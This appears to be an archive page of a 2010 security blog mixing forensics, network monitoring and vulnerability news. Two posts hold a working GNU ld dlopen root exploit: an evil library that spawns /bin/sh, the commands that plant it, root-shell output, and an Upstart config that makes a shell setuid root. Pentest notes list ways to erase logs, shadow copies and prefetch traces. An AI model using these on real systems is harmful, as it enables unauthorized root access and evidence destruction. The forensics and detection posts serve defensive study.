Thursday, November 25, 2010

Full packet capture on Cisco Firewall

Via opensourceforensics.org

 Create and fire up the packet capture
# capture MYCAP interface IFNAME packet-length 1500 buffer SIZE

The above command will capture everything; if you want to filter your capture, add an access list, like so:
#capture MYCAP interface IFNAME packet-length 1500 access-list 777 buffer SIZE

Remember to define access-list 777 first. Of course, you can substitute 777 with any other number.

Stop the capture
# no capture MYCAP interface IFNAME

Retrieve the captured data
Point your browser to the firewall SSL URL like so:
https://FW-IP-address/capture/MYCAP/pcap
Download the pcap file, and open it with wireshark or a similar tool.
Note: you can also use tftp to get the pcap.

Clean-up
# no capture MYCAP

Two new privilege escalations in Windows

Two new privilege escalations in Windows have appeared this week.

Privilege escalation in the Scheduler
Via h-online.com
Microsoft has already patched three of the four security holes exploited by Stuxnet, but the fourth hole remains unpatched. Now, an exploit, currently being circulated on the web, exploits the remaining hole in the Windows Task Planner to access protected system directories – even if a user is only logged in with limited access privileges. Experts call this a privilege escalation attack.
According to webDEViL, who developed the exploit, the demo malware works under Windows 7, Vista and Server 2008, both in their 32-bit and in the 64-bit versions.


Privilege escalation in the Registry
Via isc.sans.edu  exploit-db.com  packetstormsecurity.org
Today proof of concept code (source code, with a compiled binary) of a 0-day privilege escalation vulnerability in almost all Windows operating system versions (Windows XP, Vista, 7, Server 2008 ...) has been posted on a popular programming web site.
The vulnerability is a buffer overflow in kernel (win32k.sys) and, due to its nature allows an attacker to bypass User Access Control (UAC) on Windows Vista and 7 operating systems.
What’s interesting is that the vulnerability exist in a function that queries the registry so in order to exploit this the attacker has to be able to create a special (malicious) registry key. Author of the PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (so, a user that does not even have any administrative privileges).
The PoC code creates such a registry key and calls another library which tries to read the key and during that process it ends up calling the vulnerable code in win32k.sys. Since this is a critical area of the operating system (the kernel allows no mistakes), the published PoC only works on certain kernel versions while on others it can cause a nice BSOD. That being said, the code can be probably relatively easily modified to work on other kernel versions.

Tuesday, November 23, 2010

SSL MITM with sslstrip

Nice article that shows how to perform a MITM attack with sslstrip

Open Source Digital Forensics

I have found the Open Source Digital Forensics website via the Internet Storm Center.

The Open Source Digital Forensics site is a reference on the use of open source software in digital investigations. As shown in the papers section, open source software may have legal benefits over closed source software.

  • An investigator can learn and testify about what her open source forensic analysis tools did.
  • An investigator can testify about the conditions that existed in the suspect's open source software for a piece of evidence to be generated (i.e. a log entry).

We do not claim that open source tools are superior to closed source tools. Both can have serious bugs and faults and produce errors. This site provides an easy reference for investigators who are interested in using open source analysis tools during an investigation.

The tools section is really interesting. It covers the following areas:

  • Use to boot a suspect system into a trusted state.
  • Use to collect data from a dead or live suspect system.
  • Use to examine the data structures that organize media, such as partition tables and disk labels.
  • Use to examine a file system or disk image and show the file content and other meta data.
  • Use to analyze the contents of a file (i.e. at the application layer).
  • Use to analyze network packets and traffic. This does not include logs from network devices.
  • Use to analyze memory dumps from computers.
  • Frameworks used to build custom tools.

Thursday, November 18, 2010

Doing penetration testing with a minimal footprint

This presentation from  hack3rcon shows how to perform a penetration test that will leave a minimal footprint, thanks to the Metasploit Meterpreter.

It describes techniques to avoid leaving footprints in:  the Eventlog, the Windows Registry, the Windows Prefetch and  the File System.

Below you can read my notes (almost a copy of the slides)


Operating in the Shadows Carlos Perez a.k.a Darkoperator from Adrian Crenshaw on Vimeo.



Meterpreter
 - Runs in memory ( no disk access)
 - Memory scrubbing. Not easy to understand what meterpreter did when analizing a memory image.
 - Windows API access
 - HTTPS, TCP and UDP(DNS)
 - Encrypted traffic (man in the middle, self-generated keys)
 - Can be automated and extended

Why leaving a minimal footprint?
- Test Incident Response
- Tests monitoring systems
- Real world attacks.

Planning
- list of targets and goals (business and technical point of views)
   * Interview the client and information gathering
- Enumarate target capabilities
- Physical, SE and network
- Design an initial plan
- Modify your plan as you keep advancing
  * Gather information from the hosts (data and configuration)
  * Modify your plan if something looks out of place

Know your enemy
- First go for the easy targets
  * They will check the processes running, connections, registry keys,
     event logs and they may dump the memory
- Not all companies have an IR team
- In some companies, the system administrators are also doing security.
- We can predict what the defenders are going to do

- Their questions:
  * Process list: Time of creation, Parent PID, owned and command line
  * Connections: Why is a process like 'notepad' connecting to Internet?
  * Why is Internet Explorer connecting to a not standard port?
  * etc.
- They will create a timeline to investigate the incident.

Event log
- Command and capabilities differ among Windows versions
  (they also do not record the same data and they use different formats)
- Event log: binary format  up to windows XP.  XML format to Vista, 7 and 2008
- The IDs also changed with the new formats
- We can read from the registry without leaving footprints.
- We can get the file location, name and configuration out of the registry
  HKLM\SYSTEM\CurrentControlSet\Services\
- Script 'event_manager' works with the Eventlog from memory: query, clear, etc. It saves the data localy in a csv file.
- Windows 7 and Windows 2008 can send event logs to other servers by using winrm (ssl and self-generated certificates)
- A server can collect remote event logs if the Wecsvc service is running
- Wecsvc can be queried by using wecutil command es  (enum subscriptions)  and gs (enum configurations)
- Most interesting entries: Scheduled tasks, new/change/remove accounts, stop/start service, logon/logoff, failed logon, add/remove user from a group

Windows Registry
- OS settings
- Group policy settings
- Application settins
- Read access is available on most of it
- With the UAC enabled in Windows 7/2008R2, administrators may not be able to modify registry keys
- It can be configured to log access to it and the modifications (not set by default and rarely used)
- ACLs can be placed on registry keys (not set by default and rarely used)
- Metadata only shows Write an Creation Time, but not Access Time
- We need special tools to get the Write time: F-Response, EnCase and Open Source (http://www.forensicswiki.org/wiki/Windows_Registry)

Windows Prefetch
- Saves a list of the most commonly executed binaries to speed up the booting process. Enabled by default on client operative systems since XP .
- It shows how many times a file has been executed since it first appeared in the prefetch.
- %windir%\prefetch and can only be deleted by the administrator
- Configuratio saved in the registry
- Anything we do on the computer will create a file there.

User Assist
- Registry key that saves a counter of the programs executed by Explorer.exe
- HCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
- Each key name is the name of the executable/shortcut encrypted in ROT-13 (can be easily decrypted)
- Only the commands executed through the GUI

File System
- 2000,XP and 2003 record the last access time by default
- Vista, 7 and 2008 do not do that (performance)
- Cleaning a File MACE will not help since only $STDINFO is modified. The data will remain there.
- Deleted files and directories can be saved in a Volume Shadow (VSS or snapshots) that is enabled by default
- Some folders and file types are excluded from the snapshots and this information can be queried.

How To Operate
- Use Meterpreter commands
- Understand the scripts. Are they uploading/creating files or directories?
- check if prefetch and Volume Shadows are enabled
- Do not forget the User Assist key if the GUI is used

Know your Environment
- check your privileges
- What is running?
- What is being logged by EventLog?
- Is VSS enabled?
- What tools are they using?
- Is last Access Time logged?

Clear the Tracks
- Sometimes is better to clear the security log even if it is a dead gateway
- Delete the files and then wipe with  cipher.exe
- Delete the Volume Shadows after whiping the files
- Delete prefetch entries in client computers

Execution of Commands
- Execute from Explorer
- Use Incognito or Tokens if you are System
- If you are placing tools, stream them under system executables and execute them from there
- Use Railgun instead of executables if possible (no write to disk is done because it is injecting DLLs)

Hide your Connections
- The connections must look 'normal'. Try to behave like a ligitimate user/server would do.
- Use IPv6 when it is available because people is not looking at it.

Where to Take a Dump
- The files in the temporary folders have weird names.
- If not able to delete the VSS, check the file extensions and temporary folders.
- Be carefull what you are writting to disk, because the Antivirus will check the files (vbs,payloads)
- The duplicate and multi_meter_inject scripts can inject a meterpreter payload onto the memory of a running executable.

Wednesday, November 17, 2010

Tracking malware on a budget

Many people in IT will agree that budgets are getting smaller, if you are lucky enough to have some money at this time of the year ;)   This post talks about finding infected computers in our networks, without spending lots of money in expensive systems.

There is more and more research that provides lists of C&C servers, for the most common botnets.

As a quick resume:
- etc.

Making use of this information, we can setup an environment that permits us to quickly detect compromised computers in our network that try to reach the C&C server, making the process of detection and clean-up faster.

A possible setup could be a DNS sinkhole plus some signatures in our IDS (all the traffic redirected by the DNS sinkhole must be worth of attention).  This can be completed with a dedicated web server that permits us to know the URLs that are being used to fetch the malware.

This point of view is interesting because it permits us to gather intelligence instead of just blocking the malware.  This way, we have the opportunity to perform a  malware analysis that will help us to understand how it behaves and, thus, provide a quick way to find/remove it from our computers.

Saturday, November 13, 2010

Quick introduction to Network Security Monitoring

Network Security Monitoring  is the area of Information Security I love, Unix systems apart, and I always wanted to write about this methodology since I started this blog :)


Many of the concepts I am going to talk about are better explained in the awesome book from Richard Bejtlich entitled The Tao of Network Security Monitoring: Beyond Intrusion Detection.  You can find more information about his book in his website.



The idea behind NSM is that Network Monitoring is not just a matter of deploying an IDS or IPS in the network. When an alert is generated, the only information we have is a rule and a small packet capture with the bytes that generated the alert.

The questions here are: Do we have enough information to confirm whether this was an attack or not? Was it successful? Can we easily track the activities performed by the attacker in our network?  The short answer, is we do not know! We do not have enough details to perform an investigation.


NSM is a methodology that tries to solve this problem by offering the data that an analyst needs to perform the investigation. I will not explain all the details, because it is too long for a blog post, but I will try to briefly explain the main concepts.



Full content data

It is easy to understand that, in an ideal scenario, a full packet capture of the traffic generated by the attacker should be enough, because it contains all the details of the activities performed by the attacker in our network.

With this data, we can confirm if an attack was successful and if the attacker went deeper in our network. Furthermore, we can obtain the tool-kits that were downloaded to the compromised server. The attacker can try to fool a forensic analyst that is analysing the compromised computer, but it is not possible in network comunications.

Session data
Unfortunately, full content data does not escalate.  An analyst cannot easily perform an investigation with huge amounts of data and it is even worse when the task is in real time. Session data helps to solve this problem because it is just a summary of the traffic that passed through our sensors.

An analyst can quickly track the attacker by applying filters to the session data and then going to the full content data when it is needed. At this point, the available data consists of all the communications at the transport layer, without the content of the packets. This includes: IP addresses, protocols, ports, flags. etc..

Statistical analysis and external indicators of a compromise
Having a good base of our network and equipment helps to detect unexpected changes that may be caused by an incident or an intrusion. It could be: high network traffic, servers under high load, etc.

Sometimes, this statistical analysis can be complemented by other indicators like: servers or routers crashing, people complaining that an application is not working. etc.. Perhaps intelligence and information gathering can be also added here: third party companies/institutions complaining about attacks from our network, a post in Internet saying the we were compromised, possible active threats. etc.


Intrusion Detection Systems
In practice, an human cannot spot an attack in real time just by looking at the generated data. We need a tool that automates all this process and the analyst will only validate the alerts with the available data, as already explained. In case an incident is ongoing, the analyst will escalate the alert to the CIRT (Computer Incident Response Team).

It is important to notice that we are using an IDS (Intrusion Detection System) and not an IPS (Intrusion Prevention System). Our goal is to gather enough information to understand the attacks and act accordingly. The IPS will block a possible attack but we will miss the full picture of the incident.

Friday, November 12, 2010

Tool for timeline analysis: log2timeline

log2timeline, a framework for automatic creation of a super timeline. The main purpose is to provide a single tool to parse various log files and artifacts found on suspect systems (and supporting systems, such as network equipment) and produce a timeline that can be analysed by forensic investigators/analysts.

Example of usage: introduction  and solution

Paper

OSX update breaking PGP full disc encryption

Via darknet :

For the past day or so I’ve been seeing endless people tweeting about how the latest Mac OS X update b0rks your Mac if you are using PGP full disc encryption. It’s a pretty nasty bug, but thankfully it can be recovered from fairly easily.
If you are just looking for a quick solution, you can:
a) Not apply the update (as recommended by PGP)
b) Decypt your volumes, apply the update, then re-encrypt

For the LOL:

Users of PGP’s Whole Disk Encryption for Macs got a nasty surprise when they upgraded to the latest OS X update once they discovered their systems were no longer able to reboot.

It seems that Apple and the Symantec-owned PGP suffered a near-fatal failure to communicate that 10.6.5 ships with a new EFI booter that was incompatible with the encryption software’s boot guard. As a result, the update rendered Macs using WDE as little more than expensive paperweights.

“PGP you DO HAVE A FREAKING DEVELOPERS LICENCE FOR APPLE RIGHT???” one outraged user vented here. “YOU CANNOT TEST SYSTEM RELEASES IN ADVANCE???”
A fix was provided yesterday morning by PGP, the details are here:
Mac PGP WDE customers should not apply the recent Mac OS X 10.6.5 update

UPDATE: H security also talks about the same problem.

Physical Penetration Testing Presentation

Nice presentation made in Hack3rCon 2010

The original videos can also be found here

Resume
- Purpose and goals of the pentest
  (the customer may not know or be wrong)

  * What is running your business?

- Why?
  * attack vectors
  * evaluate the controls
  * potential vulnerabilities
  * find real threats to the organization
  * It must be a repeatable process and easy to explain
    (the methodology is important)
  * perhaps a security review can be done instead of a pentest
    (A pentest in a really insecure place is not worthy)


- Scope
  * which targets how can you attack and how?
  * what are you authorized to do versus real world?

- Methodologies
  * Open Source Security Testing Methodology
  * ISECOM
  * Crime Prevention Through Environmental Design

- Threat Source Analysis
   * actors
   * Funding, motivation and time

- Method
  * research
  * reconnaissance (google maps :D )
  * planning
  * execution
  * extraction
  * Wrap Up

- Real world examples

- Reporting

- Being catched by the Police :D

- Recommended reading

- Training

Wednesday, November 10, 2010

Quick introduction to shellcoding

This is just a presentation from 2007 that gives a quick introduction to shellcoding.

More info: Slides Video

Executing programs from memory with Metasploit

One of the most powerful characteristics of Metasploit is the ability to execute programs from Memory, without writing files to disc.

The guys from Pauldotcom had this nice technical segment in their podcast. The video shows how to duplicate (or create multiple instances) of a Meterpreter session by injecting itself onto another process.

They also show now to dump the memory of a process without touching the disk.






Show notes

Monday, November 8, 2010

Escalation via a library upload and the GNU ld dlopen vulnerability

In my previous post I was trying to find ways to gain root shell by using the dlopen vulnerability, but I could not find something interesting because I was looking at the wrong place.

At this point, we have two facts:
  • I can create world writeable files as root
  • I can load libraries that are not meant to be used by a setuid program
I was looking for ways to subvert services to gain root, when the answer was right there in the advisory.

By having the ability to upload my own evil library to the host and then execute it as described in the PoC, I can gain a root shell easily. But, since I can only load a library if it is located in the path defined in /etc/ld.so.conf , I have to find a way to copy my library to a valid directory, that is going to be owned by root.

Well, the solution to this problem can be found by making use of the vulnerability to create a world writeable file in the path (i.e. /lib) and then overwrite it with the contents of the library.

Once the library is loaded, we only need to make use of the vulnerability again to get a root shell and then secure our access to the system.

The library is really simple. It only defines a constructor that is executed by the setuid program.

#include <errno.h>
#include <unistd.h>

static void
__attribute__ ((constructor))
install (void)
{
  execl("/bin/sh", "/bin/sh", (char *) 0);
}

At this point, we only have to compile the library and follow the steps explained before


umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping

As a result,  we have root shell

user@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami
root
#

Note: this attack has been tested in an unpatched  Ubuntu 10.10

Friday, November 5, 2010

Privilege escalation with Upstart and the GNU ld dlopen vulnerability

As I wrote  in the previous  post GNUI ld dlopen privilege escalation, we can create world writable files owned by root.  The advisory states that we can create a file to /etc/cron.d/, thus we can gain root privileges by creating an entry that drops a setuid root shell, but it is not the case because Cron checks the permissions and does not allow crontabs with global write permissions (for the group and for others).

Gaining root access is not easy because umask does not allow the execute flag for files. So, we cannot put a file in the PATH that could impersonate a legit binary while it drops a suid shell somewhere in the file system, as a simple example.

There are not many places in a Unix system where we can put a file that is going to be parsed (not executed) by an application that is executed by root and, at the same time, permits to execute arbitrary commands (Cron is not the case as commented above).

An option could be to create the files /etc/profile or /etc/bashrc if they do not exist, because they are going to be sourced by bash when root logs into the server,  but they already exist in many systems and the PoC creates files but does not change permissions.

I have found out that Upstart, that is being used by many distributions, does not check the permissions when reading the configuration files and it offers directives to execute binaries (like getty, anacron, etc..).  This way,  the attacker can create a configuration file that will instruct Usptart to drop a suid root shell at boot time, thanks to the vulnerability in GNU ld.


Privilege escalation


The following example only applies for Ubuntu, but it can be modified for other distributions.
- The upstart configuration files are located in the /etc/init directory and named as XXX.conf
- The directory is owned by root with 755 permissions

The attacker has to create the file /etc/init/tty7.conf by executing the PoC and then writing  the following content onto it.
---
start on runlevel [12345]
exec /bin/bash -c "chown root.root /home/msk/exploit/shell ; chmod u+s /home/msk/exploit/shell"
---
Where /home/msk/exploit/shell is a shellcode that calls /bin/sh with suid(0)/sgid(0)


After rebooting,  /home/msk/exploit/shell will be a binary owned by root and with the setuid permission set

Thursday, November 4, 2010

Analysis techniques in image forensics

Nice post from the Windows Incident Response blog that describes several techniques for analyzing disk images.

Timeline analysis
This is a great analysis technique to use due to the fact that when you build a timeline from multiple data sources on and from within a system, you give yourself two things that you don't normally have through more traditional analysis techniques...context, and a greater relative level of confidence in your data.
 As to the overall relative level of confidence in our data, we have to understand that all data sources have a relative level of confidence associated with each of them. For example, from Chris's post, we know that the relative confidence level of the time stamps within the $STANDARD_INFORMATION attributes within the MFT (and file system) is (or should be) low. That's because these values are fairly easily changed, often through "time stomping", so that the MACB times (particularly the "B" time, or creation date of the file) do not fall within the initial timeframe of the incident. However, the time stamps within the $FILE_NAME attributes can provide us with a greater level of confidence in the data source (MFT, in this case). By adding other data sources (Event Log, Registry, Prefetch file metadata, etc.), particularly data source whose time stamps are not so easily modified (such as Registry key LastWrite times), we can elevate our relative confidence level in the data.
 Note: The SANS Computer Forensic blog talks about the same subject.

It makes sense because an analyst cannot trust only a single source of information.  We must correlate multiple data sources in order to get the full picture (context) and spot possible manipulations.


Timeline Creation
In systems with many noise does not make sense creating a full timeline because the background noise may cost you more problems than targeting only the areas you are interested in.
However, there is a method to my madness, which can be seen in part in Chris's Sniper Forensics presentation. I tend to take a targeted approach, adding the information that is necessary to complete the picture. For example, when analyzing a system that had been compromised via SQL injection, I included the file system metadata and only the web server logs that contained the SQL injection attack information. There was no need to include user information (Registry, index.dat, etc.); in fact, doing so would have added considerable noise to the timeline, and the extra data would have required significantly more effort to analyze and parse through in order to find what I was looking for.
Feedback loop
Use a knowledge database updated with findings in your previous investigations. Also, sharing information within a team is vital to achieve the goals and be more efficient.

There are also some comments about RegRipper,

RegRipper is a Windows Registry data extraction and correlation tool. RegRipper uses plugins (similar to Nessus) to access specific Registry hive files in order to access and extract specific keys, values, and data, and does so by bypassing the Win32API.


This tool can help to automate some analysis in the registry that could indicate compromises, presence of malware, etc.. with the help of the knowledge database.

The Botnet Wars: a Q&A

Interesting article that describes how botnets and the underground market work.
In today’s article (which will be a Q&A, a question & answer), I hope to be able to clear up the mystery behind these kits. I have been able to interview experts in the anti-malware world. They will each give their opinion on this particular subject.

Wednesday, November 3, 2010

w3af 1.0-rc4 available

Andres Riancho has announced  that a new version of w3af is available.

Just to name a few things we've done for this release:  
* We've written new HOWTO documents for our users 
* Considerably improved the speed of all grep plugins 
* Replaced Beautiful Soup by the faster libxml2 library 
* Introduced the usage of XPATH queries that will allow us to improve performance and reduce false positives 
* Fixed hundreds of bugs
On this release you'll also find that after exploiting a vulnerability youcan leverage that access using our Web Application Payloads, a feature that we developed together with Lucas Apa from Bonsai Information Security. These payloads allow you to escalate privileges and will help you get from a low privileged vulnerability (e.g. local file read) to a remote code execution. In order to try them, exploit a vulnerability, get any type of shell and then run any of the following commands: help, lsp, payload tcp (the last one will show you the open connections in the remote box).

Detecting time stamp manipulations in the file system

Awesome article from SANS computer forensics blog entitled Digital Forensics: Detecting time stamp manipulation.

The post describes how to spot time stamp manipulations when performing a forensic analysis.

The NTFS file system stores the time stamps in two different attributes ($STANDARD_INFORMATION and $FILE_NAME) and both have the fields Modification, Accessed , Change and Born.

Dave Hull used the $FILE_NAME attribute to spot the time stamp manipulations that may be done by tools like  timestomp or Metasploit.

$FILE_NAME is not a standard attribute that can be extracted with all forensics tools,  but Mark McKinnon has written a tool called mft_parser (not released yet) that can do that.

mft_parser_cl <MFT> <db> <bodyfile> <mount_point> 
The “db” argument is the name of a sqlite database that the tool creates, “bodyfile” is similar to the bodyfile that fls from Brian Carrier’s The Sleuth Kit produces, except that it will also include time stamps from NTFS’ $FILE_NAME attribute. The “mount_point” argument is prefixed to the paths in the bodyfile, so if you’re running this tool against a drive image that was drive C, you can provide “C” as an argument.


Notes:
Bodyfile: listing of files and directories in a file system, with its time stamps.

ProFTPD preauth remote buffer overflow

TippingPoint , under the  zero day initiative, has published a preauth remote overflow in ProFTPD.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ProFTPD. Authentication is not required to exploit this vulnerability. 
The flaw exists within the proftpd server component which listens by default on TCP port 21. When reading user input if a TELNET_IAC escape sequence is encountered the process miscalculates a buffer length counter value allowing a user controlled copy of data to a stack buffer. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the proftpd process.

Welcome back to the 90's! This smells like a  classic exploit :D

UPDATE:  the exploit has been published as well as the advisory from Zero Day Initiative.

Emerging Threats under DDoS

As Matthew Jonkman comments   in  the emerging-sigs mailing list,  Emerging Threats is under a DDoS attack since  November 1st, but the rule distributions is not being affected.

Still taking a DDoS, but we have a good idea who it is. For the time being do NOT visit emergingthreats.net. http://www.emergingthreats.net is fine, but will be down for a while yet likely. 
Rules are unaffected, make sure you're downloading from rules.emergingthreats.net. 
Thanks for everyone's support. We're doing something right if they're spending time on us. Rally the troops! Keep up the fight!
Matt